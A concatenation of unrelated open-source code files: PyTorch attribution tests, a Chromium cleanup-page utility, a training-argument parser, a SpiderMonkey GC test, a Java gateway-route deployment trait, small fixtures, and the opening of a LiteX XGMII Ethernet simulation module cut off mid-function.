self._single_input_scalar_kernel_shap_assert(lambda inp: torch.sum(net(inp)))
def test_single_kernel_shap_scalar_tensor_1d(self) -> None:
net = BasicModel_MultiLayer()
self._single_input_scalar_kernel_shap_assert(
lambda inp: torch.sum(net(inp)).reshape(1)
)
def test_single_kernel_shap_scalar_int(self) -> None:
net = BasicModel_MultiLayer()
self._single_input_scalar_kernel_shap_assert(
lambda inp: int(torch.sum(net(inp)).item())
)
def _single_input_scalar_kernel_shap_assert(self, func: Callable) -> None:
inp = torch.tensor([[2.0, 10.0, 3.0]], requires_grad=True)
mask = torch.tensor([[0, 0, 1]])
self._kernel_shap_test_assert(
func,
inp,
[[79.0, 79.0, 21.0]],
feature_mask=mask,
perturbations_per_eval=(1,),
target=None,
)
def test_multi_inp_kernel_shap_scalar_tensor_0d(self) -> None:
net = BasicModel_MultiLayer_MultiInput()
self._multi_input_scalar_kernel_shap_assert(lambda *inp: torch.sum(net(*inp)))
def test_multi_inp_kernel_shap_scalar_tensor_1d(self) -> None:
net = BasicModel_MultiLayer_MultiInput()
self._multi_input_scalar_kernel_shap_assert(
lambda *inp: torch.sum(net(*inp)).reshape(1)
)
def test_multi_inp_kernel_shap_scalar_tensor_int(self) -> None:
net = BasicModel_MultiLayer_MultiInput()
self._multi_input_scalar_kernel_shap_assert(
lambda *inp: int(torch.sum(net(*inp)).item())
)
def test_multi_inp_kernel_shap_scalar_float(self) -> None:
net = BasicModel_MultiLayer_MultiInput()
self._multi_input_scalar_kernel_shap_assert(
lambda *inp: torch.sum(net(*inp)).item()
)
def _multi_input_scalar_kernel_shap_assert(self, func: Callable) -> None:
inp1 = torch.tensor([[23.0, 100.0, 0.0], [20.0, 50.0, 30.0]])
inp2 = torch.tensor([[20.0, 50.0, 30.0], [0.0, 100.0, 0.0]])
inp3 = torch.tensor([[0.0, 100.0, 10.0], [20.0, 10.0, 13.0]])
mask1 = torch.tensor([[1, 1, 1]])
mask2 = torch.tensor([[0, 1, 2]])
mask3 = torch.tensor([[0, 1, 2]])
expected = (
[[3850.6666, 3850.6666, 3850.6666]],
[[306.6666, 3850.6666, 410.6666]],
[[306.6666, 3850.6666, 410.6666]],
)
self._kernel_shap_test_assert(
func,
(inp1, inp2, inp3),
expected,
additional_input=(1,),
feature_mask=(mask1, mask2, mask3),
perturbations_per_eval=(1,),
target=None,
n_samples=1500,
)
def _kernel_shap_test_assert(
self,
model: Callable,
test_input: TensorOrTupleOfTensorsGeneric,
expected_attr,
feature_mask: Union[None, TensorOrTupleOfTensorsGeneric] = None,
additional_input: Any = None,
perturbations_per_eval: Tuple[int, ...] = (1,),
baselines: BaselineType = None,
target: Union[None, int] = 0,
n_samples: int = 100,
delta: float = 1.0,
expected_coefs: Union[None, List[float], List[List[float]]] = None,
show_progress: bool = False,
) -> None:
for batch_size in perturbations_per_eval:
kernel_shap = KernelShap(model)
attributions = kernel_shap.attribute(
test_input,
target=target,
feature_mask=feature_mask,
additional_forward_args=additional_input,
baselines=baselines,
perturbations_per_eval=batch_size,
n_samples=n_samples,
show_progress=show_progress,
)
assertTensorTuplesAlmostEqual(
self, attributions, expected_attr, delta=delta, mode="max"
)
if expected_coefs is not None:
# Test with return_input_shape = False
attributions = kernel_shap.attribute(
test_input,
target=target,
feature_mask=feature_mask,
additional_forward_args=additional_input,
baselines=baselines,
perturbations_per_eval=batch_size,
n_samples=n_samples,
return_input_shape=False,
show_progress=show_progress,
)
assertTensorAlmostEqual(
self, attributions, expected_coefs, delta=delta, mode="max"
)
if __name__ == "__main__":
unittest.main()
| 7,437 |
575 | // Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/safe_browsing/chrome_cleaner/chrome_cleaner_navigation_util_win.h"
#include "chrome/browser/safe_browsing/chrome_cleaner/srt_field_trial_win.h"
#include "chrome/browser/ui/browser_list.h"
#include "chrome/browser/ui/browser_window.h"
#include "chrome/browser/ui/chrome_pages.h"
#include "chrome/browser/ui/tabs/tab_strip_model.h"
#include "chrome/common/url_constants.h"
#include "ui/base/page_transition_types.h"
#include "ui/base/window_open_disposition.h"
#include "url/gurl.h"
namespace chrome_cleaner_util {
namespace {
GURL GetCleanupPageURL() {
return chrome::GetSettingsUrl(chrome::kCleanupSubPage);
}
} // namespace
Browser* FindBrowser() {
BrowserList* browser_list = BrowserList::GetInstance();
for (BrowserList::const_reverse_iterator browser_iterator =
browser_list->begin_last_active();
browser_iterator != browser_list->end_last_active();
++browser_iterator) {
Browser* browser = *browser_iterator;
if (browser->is_type_normal() &&
(browser->window()->IsActive() || !browser->window()->IsMinimized())) {
return browser;
}
}
return nullptr;
}
bool CleanupPageIsActiveTab(Browser* browser) {
DCHECK(browser);
content::WebContents* web_contents =
browser->tab_strip_model()->GetActiveWebContents();
return web_contents &&
web_contents->GetLastCommittedURL() == GetCleanupPageURL();
}
void OpenCleanupPage(Browser* browser, WindowOpenDisposition disposition) {
DCHECK(browser);
browser->OpenURL(content::OpenURLParams(
GetCleanupPageURL(), content::Referrer(), disposition,
ui::PAGE_TRANSITION_AUTO_TOPLEVEL, /*is_renderer_initiated=*/false));
}
} // namespace chrome_cleaner_util
| 663 |
23,901 | <reponame>deepneuralmachine/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
# pylint: skip-file
import argparse
import os
import pickle as cp
import torch
cmd_opt = argparse.ArgumentParser(description='Argparser for grecur', allow_abbrev=False)
cmd_opt.add_argument('-save_dir', default='.', help='result output root')
cmd_opt.add_argument('-data_dir', default='.', help='data dir')
cmd_opt.add_argument('-eval_folder', default=None, help='data eval_dir')
cmd_opt.add_argument('-train_method', default='full', help='full/stage')
cmd_opt.add_argument('-phase', default='train', help='train/test')
cmd_opt.add_argument('-g_type', default=None, help='graph type')
cmd_opt.add_argument('-model_dump', default=None, help='load model dump')
cmd_opt.add_argument('-gpu', type=int, default=-1, help='-1: cpu; 0 - ?: specific gpu index')
cmd_opt.add_argument('-num_proc', type=int, default=1, help='number of processes')
cmd_opt.add_argument('-node_order', default='default', help='default/DFS/BFS/degree_descent/degree_accent/k_core/all, or any of them concat by +')
cmd_opt.add_argument('-dist_backend', default='gloo', help='dist package backend', choices=['gloo', 'nccl'])
cmd_opt.add_argument('-embed_dim', default=256, type=int, help='embed size')
cmd_opt.add_argument('-bits_compress', default=256, type=int, help='num of bits to compress')
cmd_opt.add_argument('-param_layers', default=1, type=int, help='num of param groups')
cmd_opt.add_argument('-num_test_gen', default=-1, type=int, help='num of graphs generated for test')
cmd_opt.add_argument('-max_num_nodes', default=-1, type=int, help='max num of nodes')
cmd_opt.add_argument('-rnn_layers', default=2, type=int, help='num layers in rnn')
cmd_opt.add_argument('-seed', default=34, type=int, help='seed')
cmd_opt.add_argument('-learning_rate', default=1e-3, type=float, help='learning rate')
cmd_opt.add_argument('-grad_clip', default=5, type=float, help='gradient clip')
cmd_opt.add_argument('-train_ratio', default=0.8, type=float, help='ratio for training')
cmd_opt.add_argument('-dev_ratio', default=0.2, type=float, help='ratio for dev')
cmd_opt.add_argument('-greedy_frac', default=0, type=float, help='prob for greedy decode')
cmd_opt.add_argument('-num_epochs', default=100000, type=int, help='num epochs')
cmd_opt.add_argument('-batch_size', default=10, type=int, help='batch size')
cmd_opt.add_argument('-pos_enc', default=True, type=eval, help='pos enc?')
cmd_opt.add_argument('-pos_base', default=10000, type=int, help='base of pos enc')
cmd_opt.add_argument('-old_model', default=False, type=eval, help='old model dumps?')
cmd_opt.add_argument('-tree_pos_enc', default=False, type=eval, help='pos enc for tree?')
cmd_opt.add_argument('-blksize', default=-1, type=int, help='num blksize steps')
cmd_opt.add_argument('-accum_grad', default=1, type=int, help='accumulate grad for batching purpose')
cmd_opt.add_argument('-epoch_save', default=100, type=int, help='num epochs between save')
cmd_opt.add_argument('-epoch_load', default=None, type=int, help='epoch for loading')
cmd_opt.add_argument('-batch_exec', default=False, type=eval, help='run with dynamic batching?')
cmd_opt.add_argument('-share_param', default=True, type=eval, help='share param in each level?')
cmd_opt.add_argument('-directed', default=False, type=eval, help='is directed graph?')
cmd_opt.add_argument('-self_loop', default=False, type=eval, help='has self-loop?')
cmd_opt.add_argument('-bfs_permute', default=False, type=eval, help='random permute with bfs?')
cmd_opt.add_argument('-display', default=False, type=eval, help='display progress?')
cmd_args, _ = cmd_opt.parse_known_args()
if cmd_args.save_dir is not None:
if not os.path.isdir(cmd_args.save_dir):
os.makedirs(cmd_args.save_dir)
if cmd_args.epoch_load is not None and cmd_args.model_dump is None:
cmd_args.model_dump = os.path.join(cmd_args.save_dir, 'epoch-%d.ckpt' % cmd_args.epoch_load)
print(cmd_args)
def set_device(gpu):
if torch.cuda.is_available() and gpu >= 0:
cmd_args.gpu = gpu
cmd_args.device = torch.device('cuda:' + str(gpu))
print('use gpu indexed: %d' % gpu)
else:
cmd_args.gpu = -1
cmd_args.device = torch.device('cpu')
print('use cpu')
| 1,726 |
2,494 | /* -*- Mode: C++; tab-width: 8; indent-tabs-mode: nil; c-basic-offset: 4 -*-
* vim: set ts=8 sts=4 et sw=4 tw=99:
*/
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#ifdef JSGC_GENERATIONAL
#include "js/RootingAPI.h"
#include "jsapi-tests/tests.h"
BEGIN_TEST(testGCHeapPostBarriers)
{
/* Sanity check - objects start in the nursery and then become tenured. */
JS_GC(cx->runtime());
JS::RootedObject obj(cx, NurseryObject());
CHECK(js::gc::IsInsideNursery(obj.get()));
JS_GC(cx->runtime());
CHECK(!js::gc::IsInsideNursery(obj.get()));
JS::RootedObject tenuredObject(cx, obj);
/* Currently JSObject and JSFunction objects are nursery allocated. */
CHECK(TestHeapPostBarriers(NurseryObject()));
CHECK(TestHeapPostBarriers(NurseryFunction()));
return true;
}
MOZ_NEVER_INLINE bool
Passthrough(bool value)
{
/* Work around a Win64 optimization bug in VS2010. (Bug 1033146) */
return value;
}
template <typename T>
bool
TestHeapPostBarriers(T initialObj)
{
CHECK(initialObj != nullptr);
CHECK(js::gc::IsInsideNursery(initialObj));
/* Construct Heap<> wrapper. */
JS::Heap<T> *heapData = new JS::Heap<T>();
CHECK(heapData);
CHECK(Passthrough(heapData->get() == nullptr));
heapData->set(initialObj);
/* Store the pointer as an integer so that the hazard analysis will miss it. */
uintptr_t initialObjAsInt = uintptr_t(initialObj);
/* Perform minor GC and check heap wrapper is udated with new pointer. */
cx->minorGC(JS::gcreason::API);
CHECK(uintptr_t(heapData->get()) != initialObjAsInt);
CHECK(!js::gc::IsInsideNursery(heapData->get()));
/* Check object is definitely still alive. */
JS::Rooted<T> obj(cx, heapData->get());
JS::RootedValue value(cx);
CHECK(JS_GetProperty(cx, obj, "x", &value));
CHECK(value.isInt32());
CHECK(value.toInt32() == 42);
delete heapData;
return true;
}
JSObject *NurseryObject()
{
JS::RootedObject obj(cx, JS_NewObject(cx, nullptr, JS::NullPtr(), JS::NullPtr()));
if (!obj)
return nullptr;
JS_DefineProperty(cx, obj, "x", 42, 0);
return obj;
}
JSFunction *NurseryFunction()
{
/*
* We don't actually use the function as a function, so here we cheat and
* cast a JSObject.
*/
return static_cast<JSFunction *>(NurseryObject());
}
END_TEST(testGCHeapPostBarriers)
#endif
| 1,001 |
407 | <gh_stars>100-1000
package com.alibaba.tesla.appmanager.trait.plugin;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.tesla.appmanager.common.exception.AppErrorCode;
import com.alibaba.tesla.appmanager.common.exception.AppException;
import com.alibaba.tesla.appmanager.domain.core.WorkloadResource;
import com.alibaba.tesla.appmanager.domain.schema.TraitDefinition;
import com.alibaba.tesla.appmanager.trait.BaseTrait;
import com.alibaba.tesla.appmanager.trait.plugin.util.JsonUtil;
import com.alibaba.tesla.appmanager.trait.plugin.util.RequestsUtil;
import lombok.extern.slf4j.Slf4j;
import org.apache.commons.lang3.StringUtils;
import org.apache.commons.lang3.exception.ExceptionUtils;
import com.alibaba.tesla.appmanager.common.util.StringUtil;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.concurrent.TimeUnit;
@Slf4j
public class GatewayTrait extends BaseTrait {
public GatewayTrait(String name, TraitDefinition traitDefinition, JSONObject spec, WorkloadResource ref) {
super(name, traitDefinition, spec, ref);
}
// traits:
// - name: gateway.trait.abm.io
// runtime: post
// spec:
// path: "/sreworks-job/**",
// servicePort: 81,
// serviceName: prod-job-job-master
@Override
public void execute() {
/*
1. get metadata from workload
*/
log.info("start execute gateway trait {}", getSpec().toJSONString());
WorkloadResource workloadResource = getWorkloadRef();
String name = workloadResource.getMetadata().getName();
String path = getSpec().getString("path");
String stageId = getComponent().getStageId();
String namespaceId = getComponent().getNamespaceId();
String clusterId = getComponent().getClusterId();
String gatewayEndpoint = getSpec().getString("gatewayEndpoint");
Integer order = 2500;
if (StringUtils.isEmpty(gatewayEndpoint)){
gatewayEndpoint = "http://prod-flycore-paas-gateway";
}
if (StringUtils.isEmpty(stageId)){
stageId = "dev";
}
if (StringUtils.isEmpty(namespaceId)){
namespaceId = "sreworks";
}
String serviceName = getSpec().getString("serviceName");
if (StringUtils.isEmpty(serviceName)){
serviceName = name;
}
int servicePort = getSpec().getIntValue("servicePort");
if (servicePort == 0) {
servicePort = 80;
}
String routeId = String.format("%s-%s-%s-%s", name, clusterId, namespaceId, stageId);
if (!StringUtils.isEmpty(getSpec().getString("routeId"))) {
routeId = getSpec().getString("routeId");
}
if (getSpec().getInteger("order") != null){
order = getSpec().getInteger("order");
}
boolean authEnabled = true;
if (getSpec().getBoolean("authEnabled") != null ){
authEnabled = getSpec().getBoolean("authEnabled");
}
/*
2. apply route config to gateway
*/
try {
for (int i = 0; i < 300; i++) {
try {
JSONObject applyResult = applyGatewayRoute(routeId, stageId, gatewayEndpoint, path, serviceName, servicePort, order, authEnabled);
log.info("apply gateway conf {}", applyResult.toJSONString());
}catch (Exception throwable) {
if (i == 299) {
throw throwable;
}
log.info("apply gateway conf failed, wait next try {}", getSpec().toJSONString());
TimeUnit.MILLISECONDS.sleep(5000);
}
break;
}
} catch (Exception e) {
log.error("apply gateway failed {}", ExceptionUtils.getStackTrace(e));
throw new AppException(AppErrorCode.DEPLOY_ERROR, "apply gateway failed");
}
try {
for (int i = 0; i < 3; i++) {
if (checkGatewayRoute(routeId, stageId, gatewayEndpoint, path, serviceName, servicePort, order, authEnabled)) {
break;
}
if (i == 2){
throw new AppException(AppErrorCode.DEPLOY_ERROR, "check apply gateway not pass");
}
TimeUnit.MILLISECONDS.sleep(5000);
}
} catch ( Exception e) {
log.error("check gateway failed {}", ExceptionUtils.getStackTrace(e));
throw new AppException(AppErrorCode.DEPLOY_ERROR, "check apply gateway failed");
}
}
private String getAuthPasswdHash(String username, String password){
// key = "%(user_name)s%(local_time)s%(passwd)s" % {
// 'user_name': user_name,
// 'local_time': time.strftime('%Y%m%d', time.localtime(time.time())),
// 'passwd': <PASSWORD> }
// m = hashlib.md5()
// m.update(key)
// return m.hexdigest()
SimpleDateFormat formatter = new SimpleDateFormat("yyyyMMdd");
String key = String.format("%s%s%s", username, formatter.format(new Date()), password);
// log.info("getAuthPasswdHash origin string {}", key);
return StringUtil.md5sum(key);
}
/**
* 校验gateway路由
*
* @param path 路由路径
* @param serviceName 服务名称
* @param servicePort 服务端口
* @return boolean
* */
private boolean checkGatewayRoute(String routeId, String stageId, String gatewayEndpoint, String path, String serviceName, int servicePort, int order, boolean authEnabled) throws Exception {
String username = System.getenv("ACCOUNT_SUPER_ID");
String password = System.getenv("ACCOUNT_SUPER_SECRET_KEY");
String clientId = System.getenv("ACCOUNT_SUPER_CLIENT_ID");
String clientSecret = System.getenv("ACCOUNT_SUPER_CLIENT_SECRET");
String gatewayRouteApi = String.format("%s/v2/common/gateway/route/%s", gatewayEndpoint, routeId);
String url = String.format("http://%s:%s/", serviceName, servicePort);
JSONObject resp = new RequestsUtil(gatewayRouteApi).headers(
"x-auth-app", clientId,
"x-auth-key", clientSecret,
"x-auth-user", username,
"x-auth-passwd", getAuthPasswdHash(username, password)
).get().isSuccessful()
.getJSONObject();
log.info("gateway check route:{} {}", gatewayRouteApi, resp.toJSONString());
if(resp.getInteger("code") == 200 && resp.getJSONObject("data") != null){
if(!resp.getJSONObject("data").getString("routeId").equals(routeId)){
log.info("gateway check route [routeId] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(!resp.getJSONObject("data").getString("path").equals(path)){
log.info("gateway check route [path] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(!resp.getJSONObject("data").getString("url").equals(url)){
log.info("gateway check route [url] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(resp.getJSONObject("data").getString("stageId") == null){
if(!StringUtils.equals(stageId, "prod")){
log.info("gateway check route [noStageId] not pass:{} ", resp.getJSONObject("data").toJSONString());
}
} else if (!resp.getJSONObject("data").getString("stageId").equals(stageId)){
log.info("gateway check route [stageId] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(resp.getJSONObject("data").getInteger("order") != order){
log.info("gateway check route [order] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(resp.getJSONObject("data").getBoolean("authCheck") != authEnabled){
log.info("gateway check route [authCheck] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
return true;
}else {
log.info("gateway check route not exist:{} {}", gatewayRouteApi, resp.toJSONString());
return false;
}
}
/**
* 推送gateway路由
*
* @param path 路由路径
* @param serviceName 服务名称
* @param servicePort 服务端口
* @return JSONObject
*/
private JSONObject applyGatewayRoute(String routeId, String stageId, String gatewayEndpoint, String path, String serviceName, int servicePort, int order, boolean authEnabled) throws Exception {
String username = System.getenv("ACCOUNT_SUPER_ID");
String password = System.getenv("ACCOUNT_SUPER_SECRET_KEY");
String clientId = System.getenv("ACCOUNT_SUPER_CLIENT_ID");
String clientSecret = System.getenv("ACCOUNT_SUPER_CLIENT_SECRET");
String gatewayRouteApi = String.format("%s/v2/common/gateway/route/%s", gatewayEndpoint, routeId);
String gatewayInsertApi = String.format("%s/v2/common/gateway/route", gatewayEndpoint);
String mode = "insert";
JSONObject resp = new RequestsUtil(gatewayRouteApi).headers(
"x-auth-app", clientId,
"x-auth-key", clientSecret,
"x-auth-user", username,
"x-auth-passwd", getAuthPasswdHash(username, password)
).get().isSuccessful()
.getJSONObject();
log.info("gateway check route:{} {}", gatewayRouteApi, resp.toJSONString());
if(resp.getInteger("code") == 200 && resp.getJSONObject("data") != null){
mode = "update";
}
JSONObject routeJson = JsonUtil.map(
"appId", routeId,
"authCheck", authEnabled,
"authHeader", authEnabled,
"authLogin", authEnabled,
"enable", true,
"enableFunction", false,
"enableSwaggerDoc", false,
"name", "health",
"path", path,
"routeId", routeId,
"routeType", "PATH",
"serverType", "PAAS",
// "stageId", stageId,
"order", order,
"url", String.format("http://%s:%s/", serviceName, servicePort)
);
// 当前stageId=prod时候,不增加stageId,作为默认路由
if (!StringUtils.equals(stageId, "prod")){
routeJson.put("stageId", stageId);
}
String authPasswd = getAuthPasswdHash(username, password);
log.info("gateway routeJson: {}", routeJson.toJSONString());
if (mode.equals("insert")){
return new RequestsUtil(gatewayInsertApi)
.postJson(routeJson)
.headers(
"x-auth-app", clientId,
"x-auth-key", clientSecret,
"x-auth-user", username,
"x-auth-passwd", <PASSWORD>
)
.post().isSuccessful()
.getJSONObject();
}else {
return new RequestsUtil(gatewayRouteApi)
.headers(
"x-auth-app", clientId,
"x-auth-key", clientSecret,
"x-auth-user", username,
"x-auth-passwd", <PASSWORD>
)
.postJson(routeJson)
.put().isSuccessful()
.getJSONObject();
}
}
}
| 5,586 |
708 | <reponame>sigfox/pkgcloud
{"server":{"name":"test-reboot","image":112,"flavor":1,"flavorId":1,"imageId":112,"personality":[]}} | 47 |
755 | <filename>rxgroups-annotation-test/src/test/resources/AutoTaggableObserver_Pass_All_CustomTag.java<gh_stars>100-1000
package test;
import com.airbnb.rxgroups.AutoResubscribe;
import com.airbnb.rxgroups.AutoTag;
import com.airbnb.rxgroups.AutoTaggableObserverImpl;
public class AutoTaggableObserver_Pass_All_CustomTag {
@AutoResubscribe(customTag = "tag1")
public AutoTaggableObserverImpl<Object> resubscribeObserver = new AutoTaggableObserverImpl<Object>();
@AutoTag(customTag = "tag2")
public AutoTaggableObserverImpl<Object> autoTag = new AutoTaggableObserverImpl<Object>();
}
| 199 |
1,014 | {
"EYP.F": {
"short_name": "EYDAP S.A. INH EO 0,6",
"long_name": "Athens Water Supply and Sewerage Company S.A.",
"summary": "Athens Water Supply and Sewerage Company S.A., together with its subsidiaries, engages in the water supply and refinement, and sewerage and waste management activities in Greece. The company is involved in the analysis, construction, establishment, operation, exploitation, maintenance, expansion, and modernization/renewal of water supply and sewerage installation and networks. It operates a water distribution network of 14,000 kilometers; four units of water refining with a total daily capacity of 1.8 million cubic water meters; a sewerage network of 9,500 kilometers; and three waste management centers in Psitalia, Metamorphosis, and Thriasio. The company also engages in irrigation and rain water collection activities. In addition, it produces electric energy through hydro, solar, biogas, natural gas, and thermal energy sources. Athens Water Supply and Sewerage Company S.A. was founded in 1980 and is headquartered in Athens, Greece. Athens Water Supply and Sewerage Company S.A. operates as a subsidiary of Hellenic Corporation of Assets & Participations S.A.",
"currency": "EUR",
"sector": "Utilities",
"industry": "Utilities - Regulated Water",
"exchange": "FRA",
"market": "dr_market",
"country": "Greece",
"state": null,
"city": "Athens",
"zipcode": "11146",
"website": "http://www.eydap.gr",
"market_cap": "Small Cap"
}
} | 508 |
1,501 | <reponame>osterwood/litex
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include "error.h"
#include <event2/listener.h>
#include <event2/util.h>
#include <event2/event.h>
#include <json-c/json.h>
#include <zlib.h>
#include "tapcfg.h"
#include "modules.h"
// ---------- SETTINGS ---------- //
// XGMII bus data width. Can be either 32 or 64 bit.
#define XGMII_WIDTH 64
// Ethernet MTU. Must be >= MIN_ETH_LEN.
#define ETH_LEN 9000
// MAC address for the host's TAP interface
static const char macadr[6] = {0xaa, 0xb6, 0x24, 0x69, 0x77, 0x21};
// Debug (print to stderr) invalid bus states
#define XGMII_TX_DEBUG_INVAL_SIGNAL
// Hex-dump transmitted (Sim -> TAP) packets to stderr
//#define XGMII_TX_DEBUG
// Hex-dump received (TAP -> Sim) packets to stderr
//#define XGMII_RX_DEBUG
// ------------------------------ //
#define MIN_ETH_LEN 60
#define XGMII_IDLE_DATA 0x0707070707070707
#define XGMII_IDLE_CTL 0xFF
// Contains the start XGMII control character (fb), the XGMII preamble
// (48-bit alternating 0 and 1) and the Ethernet start of frame delimiter
#define XGMII_FB_PREAMBLE_SF_DATA 0xD5555555555555FB
#define XGMII_FB_PREAMBLE_SF_CTL 0x01
#define XGMII_CTLCHAR_START 0xFB
#define XGMII_CTLCHAR_END 0xFD
#define XGMII_CTLCHAR_IDLE 0x07
// Type definitions for the XGMII bus contents, irrespective of the XGMII bus
// width used. The data here is then latched out over a bus with the
// xgmii_*_signal_t types.
typedef uint64_t xgmii_data_t;
typedef uint8_t xgmii_ctl_t;
typedef struct xgmii_bus_snapshot {
xgmii_data_t data;
xgmii_ctl_t ctl;
} xgmii_bus_snapshot_t;
#if XGMII_WIDTH == 64
typedef uint64_t xgmii_data_signal_t;
typedef uint8_t xgmii_ctl_signal_t;
#define XGMII_DATA_SIGNAL_MASK 0xFFFFFFFFFFFFFFFF
#define XGMII_CTL_SIGNAL_MASK 0xFF
// TODO: remove legacy defines
#define DW_64
#elif XGMII_WIDTH == 32
typedef uint32_t xgmii_data_signal_t;
typedef uint8_t xgmii_ctl_signal_t;
#define XGMII_DATA_SIGNAL_MASK 0xFFFFFFFF
#define XGMII_CTL_SIGNAL_MASK 0x0F
#define XGMII_UPPER_DATA_SHIFT 32
#define XGMII_UPPER_CTL_SHIFT 4
#else
#error "Invalid XGMII data width!"
#endif
// XGMII RX Mealy state machine
//
// State transitions and outputs:
//
// IDLE
// |-> IDLE: data = XGMII_IDLE_DATA
// | ctl = XGMII_IDLE_CTL
// \-> RECEIVE: data = XGMII_FB_PREAMBLE_SF_DATA
// ctl = XGMII_FB_PREAMBLE_SF_CTL
//
// RECEIVE
// |-> RECEIVE: data = 8 * <payload>
// | ctl = 0x00
// \-> IDLE: data = m * XGMII_CTLCHAR_IDLE
// | XGMII_CTLCHAR_PACKET_END
// | n * <payload>
// ctl = 0xFF & ~(2 ** n - 1)
typedef enum xgmii_rx_state {
XGMII_RX_STATE_IDLE,
XGMII_RX_STATE_RECEIVE,
} xgmii_rx_state_t;
// XGMII TX Mealy state machine
typedef enum xgmii_tx_state {
XGMII_TX_STATE_IDLE,
XGMII_TX_STATE_TRANSMIT,
} xgmii_tx_state_t;
// RX incoming (TAP -> Sim) Ethernet packet queue structs
typedef struct eth_packet_queue {
// Does not contain the trailing CRC32 checksum
uint8_t data[ETH_LEN];
size_t len;
struct eth_packet_queue *next;
} eth_packet_queue_t;
typedef struct xgmii_state {
// ---------- SIMULATION & BUS STATE ----------
// XGMII bus signals
xgmii_data_signal_t *tx_data_signal;
xgmii_ctl_signal_t *tx_ctl_signal;
xgmii_data_signal_t *rx_data_signal;
xgmii_ctl_signal_t *rx_ctl_signal;
// RX clock signal and edge state
uint8_t *rx_clk;
clk_edge_state_t rx_clk_edge;
// TX clock signal and edge state
uint8_t *tx_clk;
clk_edge_state_t tx_clk_edge;
#if XGMII_WIDTH == 32
// Internal XGMII DDR transmit (Sim -> TAP) state latched from the bus on
// the rising clock edge, until it can be processed together with the other
// half of the data on the falling clock edge. This represents the lower
// half of the bus' bits.
xgmii_data_signal_t tx_data_posedge;
xgmii_ctl_signal_t tx_ctl_posedge;
// Internal XGMII DDR receive (TAP -> Sim) state latched to the bus on the
// falling clock edge. This represents the higher half of the bus'
// bits. This is generated along with the lower half on the rising clock
// edge.
xgmii_data_signal_t rx_data_negedge;
xgmii_ctl_signal_t rx_ctl_negedge;
#endif
// ---------- GLOBAL STATE --------
tapcfg_t *tapcfg;
int tap_fd;
// ---------- TX (Sim -> TAP) STATE ---------
xgmii_tx_state_t tx_state;
// Packet currently being transmitted over the XGMII bus (Sim -> TAP).
uint8_t current_tx_pkt[ETH_LEN];
size_t current_tx_len;
// ---------- RX (TAP -> Sim) STATE ---------
xgmii_rx_state_t rx_state;
// Packet currently being received over the XGMII bus (TAP ->
// Sim). Packets copied here are already removed from the TAP
// incoming queue. Fields are valid if current_rx_len != 0. This
// field includes the CRC32 checksum.
uint8_t current_rx_pkt[ETH_LEN + sizeof(uint32_t)];
size_t current_rx_len;
size_t current_rx_progress;
// Linked list of pending RX (TAP -> Sim) packets. tail is only
// valid when head != NULL.
eth_packet_queue_t *pending_rx_pkt_head;
eth_packet_queue_t *pending_rx_pkt_tail;
struct event *ev;
} xgmii_ethernet_state_t;
// Shared libevent state, set on module init
static struct event_base *base = NULL;
/**
* Advance the RX (TAP->Sim) state machine, producing a 64-bit bus word
*
* This method must be called on the rising clock edge. It will produce a 64-bit
* XGMII bus word which needs to be presented to the device. Depending on the
* bus width, this may either happen entirely on the rising clock edge (64-bit)
* or on both the rising and falling clock edges (32-bit DDR).
*
* This function will detect pending RX packets in the queue and remove them
* accordingly. Thus it is important that this function will be called on every
* rising clock edge, regardless of whether a packet is currently being
* transmitted.
*/
static xgmii_bus_snapshot_t xgmii_ethernet_rx_adv(xgmii_ethernet_state_t *s,
uint64_t time_ps) {
xgmii_bus_snapshot_t bus;
// Check whether we are currently transmitting a packet over the XGMII
// interface (i.e. whether there are still bytes left in the packet input
// buffer)
if (s->current_rx_len) {
// There are bytes to send, check whether we're currently idling or
// already transmitting.
if (s->rx_state == XGMII_RX_STATE_IDLE) {
// Currently idling, thus initiate a new transmission.
// Reset the transmit progress
s->current_rx_progress = 0;
// Send the start-of-packet XGMII control code, the
// preamble and the start of frame delimiter.
bus.data = XGMII_FB_PREAMBLE_SF_DATA;
bus.ctl = XGMII_FB_PREAMBLE_SF_CTL;
// Enter the RECEIVE state.
s->rx_state = XGMII_RX_STATE_RECEIVE;
} else if (s->rx_state == XGMII_RX_STATE_RECEIVE) {
// Reception of the packet has been initiated, transfer as much as
// required.
// Initialize ctl and data to zero
bus.ctl = 0;
bus.data = 0;
// Place the bytes one by one: either with data, end of frame
// delimiters or idle markers
for (int idx = 0; idx < sizeof(bus.data); idx++) {
if (s->current_rx_progress < s->current_rx_len) {
// Actual data byte to transmit
bus.data |=
((uint64_t)
(s->current_rx_pkt[s->current_rx_progress] & 0xFF))
<< (idx * 8);
s->current_rx_progress++;
} else if (s->current_rx_progress == s->current_rx_len) {
// End of frame delimiter to transmit
bus.data |=
((uint64_t) XGMII_CTLCHAR_END)
<< (idx * 8);
bus.ctl |= 1 << idx;
// We deliberately let the progress advance beyond the
// length here, to indicate that we've already transmitted
// the end-of-frame buffer
s->current_rx_progress++;
// Furthermore, set the packet length to zero to mark
// that a new packet can be transmitted (invalidating
// the current one).
s->current_rx_len = 0;
// We return into the idle state here, there's nothing more
// to send.
s->rx_state = XGMII_RX_STATE_IDLE;
} else {
// Fill the rest of this bus word with idle indicators
